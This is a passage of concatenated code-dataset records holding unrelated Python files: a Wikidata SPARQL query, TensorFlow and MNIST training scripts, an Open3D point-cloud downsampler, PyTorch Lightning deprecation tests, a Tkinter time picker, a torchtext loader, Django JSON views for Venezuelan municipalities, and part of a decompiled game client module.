psutil.process_iter())\n","sub_path":"assistant/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"163425104","text":"\n#%%\nimport sys\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nimport pandas as pd\n\nendpoint_url = \"https://query.wikidata.org/sparql\"\nuser_agent = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\nsparql = SPARQLWrapper(endpoint_url,agent=user_agent)\nsparql.setReturnFormat(JSON)\n#%%\nquery = \"\"\"\nSELECT DISTINCT ?country ?countryLabel ?language ?languageLabel ?ISO ?countryISO\nWHERE\n{\n ?country wdt:P37 ?language;\n wdt:P298 ?countryISO.\n ?language wdt:P220 ?ISO.\n ?country rdfs:label ?countryLabel . FILTER(lang(?countryLabel)='en')\n ?language rdfs:label ?languageLabel . FILTER(lang(?languageLabel)='en')\n SERVICE wikibase:label { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE]\". }\n}\nORDER BY ?country\n\"\"\"\n#endregion\n#%%\nsparql.setQuery(query)\nresults = sparql.query().convert()\ndf = pd.json_normalize(results[\"results\"][\"bindings\"])\ndf = df[[col for col in df.columns if 'value' in col]]\ndf = df.rename(columns = lambda col: col.replace(\".value\", \"\"))\n#df.to_csv('query_final.csv')\n# %%","sub_path":"df_principal/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146753267","text":"# 在终端中输入 tensorboard --logdir=logs\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '2'\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 添加层函数\ndef add_layer(inputs, in_size, out_size, n_layer, activation_function = None):\n layer_name = 'layer%s' % n_layer\n with tf.name_scope('layer_name'):\n with tf.name_scope('weights'):\n Weights = tf.Variable(tf.random.normal([in_size, out_size]), name='W')\n tf.compat.v1.summary.histogram(layer_name+'/weights', Weights)\n with tf.name_scope('biases'): \n biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n tf.compat.v1.summary.histogram(layer_name+'/biases', biases)\n with tf.name_scope('Wx_plus_b'):\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n tf.compat.v1.summary.histogram(layer_name+'/outputs', outputs)\n\n return outputs\n\n# 生成训练数据\nx_data = np.linspace(-1, 1, 300)[:, np.newaxis] # -1 to 1 , 300 examples\nnoise = np.random.normal(0, 0.05, x_data.shape)\ny_data = np.square(x_data) - 0.5 + noise\n\n# 定义输入placeholder,并在tensorboard中成组为input\nwith tf.name_scope('input'):\n xs = tf.compat.v1.placeholder(tf.float32, [None, 1], name='x_input')\n ys = tf.compat.v1.placeholder(tf.float32, [None, 1], name='y_input')\n\n# 生成含一层隐藏层的神经网络\nl1 = add_layer(xs, 1, 10, n_layer=1, activation_function=tf.nn.relu)\nprediction = add_layer(l1, 10, 1, n_layer=2, activation_function=None)\n\n# 定义loss和优化器\nwith tf.name_scope('loss'):\n loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), reduction_indices = [1])) # 按行求和,再求各行的平均值\n tf.compat.v1.summary.scalar('loss', loss)\nwith tf.name_scope('train'):\n train_step = tf.compat.v1.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n# 初始化所有变量\ninit = tf.compat.v1.global_variables_initializer()\n\n# 初始化对话\nsess = tf.compat.v1.Session()\nmerged = tf.compat.v1.summary.merge_all() # 合并所有summary\nwriter = tf.compat.v1.summary.FileWriter(\"logs/\", sess.graph) # 输出tensorboard信息\nsess.run(init)\n\n# 建立图形\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.scatter(x_data, y_data) # 显示real data\nplt.ion() # 确保可以连续输入图形\n\n# 进行训练\nfor i in range(1000):\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n if i % 50 == 0:\n result = sess.run(merged, feed_dict={xs: x_data, ys: y_data})\n writer.add_summary(result, i)\n print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))\n\n # 当有线的时候先抹除,否则跳过\n try:\n ax.lines.remove(lines[0])\n except Exception:\n pass\n\n # 创建新线\n prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n \n # 延迟绘图\n plt.pause(0.1)\n\n# 显示现有图形不关闭\nplt.show()\nplt.pause(0)","sub_path":"exp5_addNNLayer.py","file_name":"exp5_addNNLayer.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"251840584","text":"import open3d\nimport os\nimport numpy as np\nfrom util.point_cloud_util import load_labels, write_labels\nfrom dataset.semantic_dataset import all_file_prefixes\n\n\ndef down_sample(\n dense_pcd_path, dense_label_path, sparse_pcd_path, sparse_label_path, processed_pcd_path, processed_label_path, voxel_size\n):\n # Skip if done\n if os.path.isfile(sparse_pcd_path) and (\n not os.path.isfile(dense_label_path) or os.path.isfile(sparse_label_path)\n ):\n print(\"Skipped:\", file_prefix)\n return\n else:\n print(\"Processing:\", file_prefix)\n\n # Inputs\n dense_pcd = open3d.read_point_cloud(dense_pcd_path)\n try:\n dense_labels = load_labels(dense_label_path)\n except:\n dense_labels = None\n\n # Skip label 0, we use explicit frees to reduce memory usage\n print(\"Num points:\", np.asarray(dense_pcd.points).shape[0])\n if dense_labels is not None:\n non_zero_indexes = dense_labels != 0\n\n dense_points = np.asarray(dense_pcd.points)[non_zero_indexes]\n dense_pcd.points = open3d.Vector3dVector()\n dense_pcd.points = open3d.Vector3dVector(dense_points)\n #\n #xyz = dense_points.copy()\n #print(xyz.shape)\n del dense_points\n\n dense_colors = np.asarray(dense_pcd.colors)[non_zero_indexes]\n dense_pcd.colors = open3d.Vector3dVector()\n dense_pcd.colors = open3d.Vector3dVector(dense_colors)\n #\n #i = (dense_colors[:,0]).reshape(-1,1)\n #print(i.shape)\n del dense_colors\n\n #\n #dense_labels = dense_labels[non_zero_indexes]\n #data = np.concatenate((xyz, i), axis=1)\n #print(data.shape, dense_labels.shape)\n #np.savez(processed_label_path, dense_labels)\n #np.savez(processed_pcd_path, data)\n #del xyz, i, data\n\n print(\"Num points after 0-skip:\", np.asarray(dense_pcd.points).shape[0])\n\n # Downsample points\n min_bound = dense_pcd.get_min_bound() - voxel_size * 0.5\n max_bound = dense_pcd.get_max_bound() + voxel_size * 0.5\n\n sparse_pcd, cubics_ids = open3d.voxel_down_sample_and_trace(\n dense_pcd, voxel_size, min_bound, max_bound, False\n )\n print(\"Num points after down sampling:\", np.asarray(sparse_pcd.points).shape[0])\n\n open3d.write_point_cloud(sparse_pcd_path, sparse_pcd)\n print(\"Point cloud written to:\", sparse_pcd_path)\n########################\n sparse_pcd_npz = open3d.read_point_cloud(sparse_pcd_path)\n xyz = np.asarray(sparse_pcd_npz.points)\n \n i = np.asarray(sparse_pcd_npz.colors)\n #print('All Values:',i[:,:10])\n #print(i.min(), i.max())\n i = (i[:,0]).reshape(-1,1)\n #print('Intensity(1):',i[:10])\n i *=255\n #print('Intensity(255):',i[:10])\n i = (20*i - 2500)/10\n #print('Intensity(Ori):',i[:10])\n i = 10**(i/200)\n #print('Intensity(log):',i[:10])\n print(i.min(), i.max())\n #i = (i*255)-127\n #print(xyz.shape)\n #print(i.shape)\n data = np.concatenate((xyz, i), axis=1)\n print(data.shape)\n np.savez(processed_pcd_path, data)\n\n # Downsample labels\n if dense_labels is not None:\n sparse_labels = []\n for cubic_ids in cubics_ids:\n cubic_ids = cubic_ids[cubic_ids != -1]\n cubic_labels = dense_labels[cubic_ids]\n sparse_labels.append(np.bincount(cubic_labels).argmax())\n \n write_labels(sparse_label_path, sparse_labels)\n print(\"Labels written to:\", sparse_label_path)\n sparse_labels = np.array(sparse_labels)\n print(\"Labels:\", sparse_labels.shape)\n np.savez(processed_label_path, sparse_labels)\n\n\n\n \nif __name__ == \"__main__\":\n voxel_size = 0.05\n\n # By default\n # raw data: \"dataset/semantic_raw\"\n # downsampled data: \"dataset/semantic_downsampled\"\n current_dir = os.path.dirname(os.path.realpath(__file__))\n dataset_dir = os.path.join(current_dir, \"dataset\")\n raw_dir = os.path.join(dataset_dir, \"intense_log\")\n downsampled_dir = os.path.join(dataset_dir, \"semantic_downsampled/xyzi_log\") #test\n #processed_dir = os.path.join(dataset_dir, \"semantic_downsampled/trial\") #processed\n\n # Create downsampled_dir\n os.makedirs(downsampled_dir, exist_ok=True)\n #os.makedirs(processed_dir, exist_ok=True)\n\n for file_prefix in all_file_prefixes:\n # Paths\n dense_pcd_path = os.path.join(raw_dir, file_prefix + \".pcd\")\n dense_label_path = os.path.join(raw_dir, file_prefix + \".labels\")\n sparse_pcd_path = os.path.join(downsampled_dir, file_prefix + \".pcd\")\n sparse_label_path = os.path.join(downsampled_dir, file_prefix + \".labels\")\n processed_pcd_path = os.path.join(downsampled_dir, file_prefix + \"_vertices.npz\")\n processed_label_path = os.path.join(downsampled_dir, file_prefix + \"_labels.npz\")\n\n # Put down_sample in a function for garbage collection\n down_sample(\n dense_pcd_path,\n dense_label_path,\n sparse_pcd_path,\n sparse_label_path,\n processed_pcd_path,\n processed_label_path,\n voxel_size,\n )\n","sub_path":"downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581046512","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test deprecated functionality which will be removed in v1.6.0.\"\"\"\nfrom unittest.mock import call, Mock\n\nimport pytest\n\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.utilities.model_helpers import is_overridden\nfrom pytorch_lightning.utilities.model_summary import ModelSummary\nfrom tests.helpers import BoringModel\n\n\ndef test_old_transfer_batch_to_device_hook(tmpdir):\n class OldModel(BoringModel):\n def transfer_batch_to_device(self, batch, device):\n return super().transfer_batch_to_device(batch, device, None)\n\n trainer = Trainer(default_root_dir=tmpdir, limit_train_batches=1, limit_val_batches=0, max_epochs=1)\n with pytest.deprecated_call(match=\"old signature will be removed in v1.6\"):\n trainer.fit(OldModel())\n\n\ndef test_v1_6_0_reload_dataloaders_every_epoch(tmpdir):\n model = BoringModel()\n\n tracker = Mock()\n model.train_dataloader = Mock(wraps=model.train_dataloader)\n model.val_dataloader = Mock(wraps=model.val_dataloader)\n model.test_dataloader = Mock(wraps=model.test_dataloader)\n\n tracker.attach_mock(model.train_dataloader, \"train_dataloader\")\n tracker.attach_mock(model.val_dataloader, \"val_dataloader\")\n tracker.attach_mock(model.test_dataloader, \"test_dataloader\")\n\n with pytest.deprecated_call(match=\"`reload_dataloaders_every_epoch` is deprecated in v1.4 and will be removed\"):\n trainer = Trainer(\n default_root_dir=tmpdir,\n limit_train_batches=0.3,\n limit_val_batches=0.3,\n reload_dataloaders_every_epoch=True,\n max_epochs=3,\n )\n trainer.fit(model)\n trainer.test()\n\n expected_sequence = (\n [call.val_dataloader()] + [call.train_dataloader(), call.val_dataloader()] * 3 + [call.test_dataloader()]\n )\n assert tracker.mock_calls == expected_sequence\n\n\ndef test_v1_6_0_is_overridden_model():\n model = BoringModel()\n with pytest.deprecated_call(match=\"and will be removed in v1.6\"):\n assert is_overridden(\"validation_step\", model=model)\n with pytest.deprecated_call(match=\"and will be removed in v1.6\"):\n assert not is_overridden(\"foo\", model=model)\n\n\ndef test_v1_6_0_train_loop(tmpdir):\n trainer = Trainer()\n with pytest.deprecated_call(\n match=r\"`Trainer.train_loop` has been renamed to `Trainer.fit_loop` and will be removed in v1.6.\"\n ):\n _ = trainer.train_loop\n\n\ndef test_v1_6_0_deprecated_model_summary_mode(tmpdir):\n model = BoringModel()\n with pytest.deprecated_call(match=\"Argument `mode` in `ModelSummary` is deprecated in v1.4\"):\n ModelSummary(model, mode=\"top\")\n\n with pytest.deprecated_call(match=\"Argument `mode` in `LightningModule.summarize` is deprecated in v1.4\"):\n model.summarize(mode=\"top\")\n\n\ndef test_v1_6_0_deprecated_disable_validation():\n trainer = Trainer()\n with pytest.deprecated_call(match=\"disable_validation` is deprecated in v1.4\"):\n _ = trainer.disable_validation\n\n\ndef test_v1_6_0_deprecated_hpc_load(tmpdir):\n model = BoringModel()\n trainer = Trainer(default_root_dir=tmpdir, max_steps=1)\n trainer.fit(model)\n trainer.checkpoint_connector.hpc_save(tmpdir, trainer.logger)\n checkpoint_path = trainer.checkpoint_connector.get_max_ckpt_path_from_folder(str(tmpdir))\n with pytest.deprecated_call(match=r\"`CheckpointConnector.hpc_load\\(\\)` was deprecated in v1.4\"):\n trainer.checkpoint_connector.hpc_load(checkpoint_path)\n","sub_path":"tests/deprecated_api/test_remove_1-6.py","file_name":"test_remove_1-6.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233320157","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nmnist=input_data.read_data_sets(\"data_set\",one_hot=True)\nX=tf.placeholder(tf.float32,[None,784])\nY=tf.placeholder(tf.float32,[None,10])\n#初始化权重\ndef init_weight(shape):\n return tf.Variable(tf.random_normal(shape,stddev=0.01))\n#构建网路\nw=init_weight([3,3,1,32])\nw2=init_weight([3,3,32,64])\nw3=init_weight([3,3,64,128])\nw4=init_weight([128*4*4,625])\nw_o=init_weight([625,10])\n#X:输入数据\n#w:每一层权重\n# p_keep_conv,p_keep_hidden :dropout要保留神经元比例\ndef model(X,w,w2,w3,w4,w_o,p_keep_conv,p_keep_hidden):\n #第一层卷积以及池化\n X=tf.reshape(X,shape=[-1,28,28,1])\n l1a=tf.nn.relu(tf.nn.conv2d(X,w,strides=[1,1,1,1],padding=\"SAME\"))\n l1=tf.nn.max_pool(l1a,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"SAME\")\n l1=tf.nn.dropout(l1,p_keep_conv)\n #第二层卷积以及池化\n l2a=tf.nn.relu(tf.nn.conv2d(l1,w2,strides=[1,1,1,1],padding=\"SAME\"))\n l2=tf.nn.max_pool(l2a,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"SAME\")\n l2=tf.nn.dropout(l2,p_keep_conv)\n #第三层卷积以及池化\n l3a = tf.nn.relu(tf.nn.conv2d(l2, w3, strides=[1, 1, 1, 1], padding=\"SAME\"))\n l3 = tf.nn.max_pool(l3a, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n l3 = tf.reshape(l3, [-1, w4.get_shape().as_list()[0]])\n l3 = tf.nn.dropout(l3, p_keep_conv)\n #全连接层\n l4=tf.nn.relu(tf.matmul(l3,w4))\n l4=tf.nn.dropout(l4,p_keep_hidden)\n #输出层\n pyx=tf.matmul(l4,w_o)\n return pyx\n\np_keep_conv =tf.placeholder(\"float\")\np_keep_hidden = tf.placeholder(\"float\")\npy_x=model(X,w,w2,w3,w4,w_o,p_keep_conv,p_keep_hidden)\n#cost\ncost=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=py_x,labels=Y))\ntrain_step=tf.train.AdamOptimizer(0.001).minimize(cost)\npred=tf.argmax(py_x,1)\n#训练\nbatch_size=128\ntest_size=128\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n xx = []\n l = []\n for i in range(5000):\n batch_train_x,batch_train_y=mnist.train.next_batch(batch_size)\n sess.run(train_step,feed_dict={X:batch_train_x,Y:batch_train_y,\n p_keep_conv:0.8,p_keep_hidden:0.6})\n batch_test_x, batch_test_y = mnist.test.next_batch(batch_size)\n accuracy=np.mean(np.argmax(batch_test_y,1)==\n sess.run(pred,feed_dict={X:batch_test_x,Y:batch_test_y,\n p_keep_conv:1,p_keep_hidden:1}))\n xx.append(accuracy)\n l.append(i)\n print(\"loss:\",sess.run(cost, feed_dict={X: batch_train_x, Y: batch_train_y,\n p_keep_conv: 0.8, p_keep_hidden: 0.6}))\n print(\"test accuracy:\",accuracy)\n\n batch_test_x= mnist.test.images\n batch_test_y= mnist.test.labels\n accuracy = np.mean(np.argmax(batch_test_y, 1) ==\n sess.run(pred, feed_dict={X: batch_test_x, Y: batch_test_y,\n p_keep_conv: 1, p_keep_hidden: 1}))\n print(\"final accuracy:\",accuracy)\n plt.plot(l, xx)\n plt.show()\n","sub_path":"mnist_cnn/mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551048806","text":"from enum import Enum\nfrom datetime import datetime\nfrom tkinter import E, Frame, N, S, W\n\nfrom utils.config import ConfigValues\nfrom utils.flatButton import FlatButton\n\nfrom utils.internationalization import Internationalization\n\n\nclass SetTimeCallback(Enum):\n CLOSE = 0\n SET_TIME = 1\n\nclass SetTimeView(Frame):\n\n # bound (Bool): Are the two variables linked? (Can variable 2 be less than variable 1)\n def __init__(self, callback, parent=None):\n self.config = ConfigValues()\n Frame.__init__(self, parent, bg=self.config.values['colors']['darkBlue'])\n\n self.callback = callback\n now = datetime.now()\n dt = now.strftime(\"%H%M\")\n self.time = [int(dt[0]), int(dt[1]), int(dt[2]), int(dt[3])]\n\n Internationalization()\n\n self.fill_frame()\n\n def getTime(self):\n return str(self.time[0]) + str(self.time[1]) + \":\" + str(self.time[2]) + str(self.time[3])\n\n def returnTimeCallback(self, ttype):\n self.callback(ttype, self.getTime())\n\n def makeValid(self, time, index, change):\n if index == 0:\n time[0] += change\n if time[0] == -1 or time[0] == 3:\n time[0] += (-1*change*3)\n if time[0] == 2 and time[1] > 3:\n time[1] = 3\n\n if index == 1:\n time[1] += change\n if time[0] == 2 and time[1] == 4:\n time[1] = 0\n elif time[1] == -1:\n if time[0] == 2:\n time[1] = 3\n else:\n time[1] = 9\n elif time[1] > 9:\n time[1] = 0\n \n if index == 2:\n time[2] += change\n if time[2] in [-1, 6]:\n time[2] += (-1*change*6)\n \n if index == 3:\n time[3] += change\n if time[3] in [-1, 10]:\n time[3] += (-1*change*10)\n \n\n return time\n\n def update(self):\n self.first_digit.setText(self.time[0])\n self.second_digit.setText(self.time[1])\n self.third_digit.setText(self.time[2])\n self.fourth_digit.setText(self.time[3])\n\n def changeTimeCallback(self, arg):\n (index, change) = arg\n newtime = self.time[:]\n \n self.time = self.makeValid(newtime, index, change)\n\n self.update()\n\n def drawPlusButtons(self):\n first_plus = FlatButton(self, self.changeTimeCallback, (0, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n first_plus.setText(\"+\")\n first_plus.grid(row=1, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n second_plus = FlatButton(self, self.changeTimeCallback, (1, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n second_plus.setText(\"+\")\n second_plus.grid(row=1, column=1, sticky=N+S+E+W, padx=10, pady=10)\n\n third_plus = FlatButton(self, self.changeTimeCallback, (2, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n third_plus.setText(\"+\")\n third_plus.grid(row=1, column=3, sticky=N+S+E+W, padx=10, pady=10)\n\n fourth_plus = FlatButton(self, self.changeTimeCallback, (3, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n fourth_plus.setText(\"+\")\n fourth_plus.grid(row=1, column=4, sticky=N+S+E+W, padx=10, pady=10)\n\n def drawTime(self):\n self.first_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.first_digit.grid(row=2, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n self.second_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.second_digit.grid(row=2, column=1, sticky=N + S + E + W, padx=10, pady=10)\n\n dots = FlatButton(self, self.changeTimeCallback, (1, 1), self.config.values['colors']['darkBlue'],\n fontSize=40)\n dots.setText(\":\")\n dots.grid(row=2, column=2, sticky=N + S + E + W, padx=10, pady=10)\n\n self.third_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.third_digit.grid(row=2, column=3, sticky=N + S + E + W, padx=10, pady=10)\n\n self.fourth_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.fourth_digit.grid(row=2, column=4, sticky=N + S + E + W, padx=10, pady=10)\n\n self.update()\n\n def drawMinusButtons(self):\n first_miuns = FlatButton(self, self.changeTimeCallback, (0, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n first_miuns.setText(\"-\")\n first_miuns.grid(row=3, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n second_miuns = FlatButton(self, self.changeTimeCallback, (1, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n second_miuns.setText(\"-\")\n second_miuns.grid(row=3, column=1, sticky=N+S+E+W, padx=10, pady=10)\n\n third_miuns = FlatButton(self, self.changeTimeCallback, (2, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n third_miuns.setText(\"-\")\n third_miuns.grid(row=3, column=3, sticky=N+S+E+W, padx=10, pady=10)\n\n fourth_miuns = FlatButton(self, self.changeTimeCallback, (3, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n fourth_miuns.setText(\"-\")\n fourth_miuns.grid(row=3, column=4, sticky=N+S+E+W, padx=10, pady=10)\n\n\n def fill_frame(self):\n label_btn = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=25)\n label_btn.setText(_(\"Set the Time\"))\n label_btn.grid(row=0, column=0, columnspan=5, sticky=N+S+E+W, padx=10, pady=10)\n\n self.drawPlusButtons()\n self.drawTime()\n self.drawMinusButtons()\n\n confirm_btn = FlatButton(self, self.returnTimeCallback, SetTimeCallback.SET_TIME, self.config.values['colors']['green'], fontSize=40)\n confirm_btn.setText(_(\"Confirm\"), \"white\")\n confirm_btn.grid(row=4, column=0, columnspan=5, sticky=N + S + E + W, padx=20, pady=(60, 20))\n\n for i in range(0, 5):\n self.columnconfigure(i, weight=5)\n\n self.columnconfigure(2, weight=1)\n\n self.rowconfigure(0, weight=1)\n for i in range(1, 5):\n self.rowconfigure(i, weight=2)\n","sub_path":"src/views/setTimeView.py","file_name":"setTimeView.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9287613","text":"from torchtext.vocab import Vectors\nfrom torchtext import data\nimport jieba\n\n# import sys\n# import os\n# currentUrl = os.path.dirname(__file__)\n# parentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\n# sys.path.append(parentUrl)\n# from my_args import *\n\n\ndef load_word_vectors(model_name, model_path):\n vectors = Vectors(name=model_name, cache=model_path)\n return vectors\n\n\ndef tokenizer_zh(x):\n \"\"\"\n \"The quick fox jumped over a lazy dog.\" -> (tokenization)\n [\"The\", \"quick\", \"fox\", \"jumped\", \"over\", \"a\", \"lazy\", \"dog\", \".\"]\n \"\"\"\n res = [w for w in jieba.cut(x, cut_all=False)]\n return res\n\n\ndef build_stop_words_set(set_dir):\n stop_words = []\n with open(set_dir) as f:\n for l in f.readlines():\n stop_words.append(l.strip())\n return stop_words\n\n\ndef create_field(args):\n stop_words = build_stop_words_set(args.dataset + 'stop_words.txt')\n text_field = data.Field(sequential=True, tokenize=tokenizer_zh, fix_length=args.sen_len, stop_words=stop_words)\n label_field = data.Field(sequential=False)\n return text_field, label_field\n\n\ndef get_dataset(text_field, label_field, args):\n train, valid, test = data.TabularDataset.splits(path=args.dataset, format='tsv', skip_header=False,\n train='train.tsv',\n validation='valid.tsv',\n test='test.tsv',\n fields=[('text', text_field), ('label', label_field)]\n )\n return train, valid, test\n\n\ndef load_dataset(text_field, label_field, args, **kwargs):\n # ************************** get torch text dataset ***************************\n train_dataset, dev_dataset, test_dataset = get_dataset(text_field, label_field, args)\n\n # ************************** build vocabulary *********************************\n if args.static and args.pretrained_name and args.pretrained_path:\n # load pre-trained embedding vocab\n vectors = load_word_vectors(args.pretrained_name, args.pretrained_path)\n text_field.build_vocab(train_dataset, dev_dataset, vectors=vectors)\n else:\n text_field.build_vocab(train_dataset, dev_dataset) # build vocab from train/val dataset only\n\n label_field.build_vocab(train_dataset, dev_dataset) # change from '0', '1' to 0,1\n\n print('Num of class is ' + str(len(label_field.vocab)))\n print(label_field.vocab.stoi)\n\n # ************************** build Iterator ***********************************\n train_iter, dev_iter, test_iter = data.Iterator.splits(\n (train_dataset, dev_dataset, test_dataset),\n batch_sizes=(args.batch_size, args.batch_size, args.batch_size),\n sort_key=lambda x: len(x.text),\n **kwargs)\n return train_iter, dev_iter, test_iter\n\n\n# if __name__ == \"__main__\":\n#\n# args = build_args_parser()\n#\n# Text_field, Label_field = create_field(args)\n# print(Text_field) # torchtext.data.field.Field object\n# print(Label_field) # torchtext.data.field.Field object\n#\n# print('TEST Function: get_dataset ....')\n# Train_dataset, Dev_dataset, Test_dataset = get_dataset(Text_field, Label_field, args)\n#\n# max_len = -1\n# id = 0\n#\n# for i in range(len(Train_dataset)):\n# if len(Train_dataset[i].text) > max_len:\n# max_len = len(Train_dataset[i].text)\n# id = i\n#\n# print(id)\n# print('max length %d' % max_len)\n#\n# print(Train_dataset[id].text) # ['你', '快', '休息', '我爱你', '小度']\n# print(Train_dataset[id].label) # 1\n#\n# Train_iter, Dev_iter, Test_iter = load_dataset(Text_field, Label_field, args,\n# device=-1, repeat=False, shuffle=True)\n# # Test_iter\n# batch = next(iter(Train_iter))\n# print(batch.text.shape)\n# print(batch.label.shape)\n#\n# # vectors = load_word_vectors('sgns.zhihu.word', '../pretrained')\n","sub_path":"fast_text_torch/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"31614030","text":"# -*- coding: utf-8 -*-\nfrom utils.decorators import json_response, requires_get\nfrom venezuela.models import Municipio, Parroquia\nimport json\n\n@json_response\n@requires_get\ndef municipios_json(request, pk):\n \"\"\"\n Obtiene una lista de los municipios por cada estado seleccionado\n Parametros\n - pk (int) = clave primaria del estado\n Reorna\n - {'success': Boolean, 'municipios': Diccionario}\n Ejm:\n - Json {\n 'success': True, \n 'municipios': \n {\"id\": 223, \"nombre\": \"Acevedo\"}, \n {\"id\": 224, \"nombre\": \"Andres Bello\"}, \n {...}, {...}}\n \"\"\"\n\n if pk:\n pk = int(pk)\n municipo = Municipio.objects.filter(estado=pk)\n municipo_list = [{\"id\": m.id, \"nombre\": m.municipio} for m in municipo]\n return {'success': True, 'municipios': municipo_list}\n\n return {'success': False, 'error': \"No se pudo obtener la lista de municipios\"}\n\n@json_response\n@requires_get\ndef parroquias_json(request, pk):\n \"\"\"\n Obtiene una lista de las parroquias por cada municipio seleccionado\n Parametros\n - pk (int) = clave primaria del municipio\n Reorna\n - {'success': Boolean, 'parroquia': Diccionario}\n Ejm:\n - Json {\n 'success': True, \n 'parroquia': \n {\"id\": 223, \"nombre\": \"Acevedo\"}, \n {\"id\": 224, \"nombre\": \"Andres Bello\"}, \n {...}, {...}}\n \"\"\"\n\n if pk:\n pk = int(pk)\n parroquia = Parroquia.objects.filter(municipio=pk)\n parroquia_list = [{\"id\": p.id, \"nombre\": p.parroquia} for p in parroquia]\n return {'success': True, 'parroquias': parroquia_list}\n\n return {'success': False, 'error': \"No se pudo obtener la lista de las parroquias\"}\n","sub_path":"utils/vzla.py","file_name":"vzla.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161176084","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/epicBattle/epic_prestige_progress.py\nfrom gui import makeHtmlString\nfrom gui.Scaleform.locale.EPIC_BATTLE import EPIC_BATTLE\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\nfrom gui.shared.formatters import icons, text_styles\nfrom gui.shared.gui_items import Vehicle\nfrom helpers import dependency, int2roman, i18n\nfrom skeletons.gui.game_control import IEpicBattleMetaGameController\nfrom skeletons.gui.shared import IItemsCache\nFRONTLINE_PRESTIGE_TOKEN_TEMPLATE = 'epicmetagame:prestige:%d'\nFRONTLINE_LEVEL_TOKEN_TEMPLATE = 'epicmetagame:levelup:%d'\n_ICON_NAME_TO_PRESTIGE_LEVEL = {'1': range(0, 4),\n '2': range(4, 7),\n '3': range(7, 10),\n '4': range(10, 11)}\n\nclass PrestigeBonusType(object):\n VEHICLE = 'vehicles'\n BADGE = 'dossier'\n\n\nclass LineSeparatorUI(object):\n GREY_LINE = 'greyLineSeparatorUI'\n GREEN_LINE = 'greenLineSeparatorUI'\n YELLOW_LINE = 'yellowLineSeparatorUI'\n\n\nclass PrestigeBlockIconPostfix(object):\n CURRENT = 'current'\n REACHED = 'reached'\n PRESTIGE = 'prestige'\n LOCKED = 'locked'\n UNLOCKED = 'unlocked'\n\n\nclass PrestigeBlockIconState(object):\n NORMAL = 'normal'\n SPECIAL = 'special'\n\n\nclass 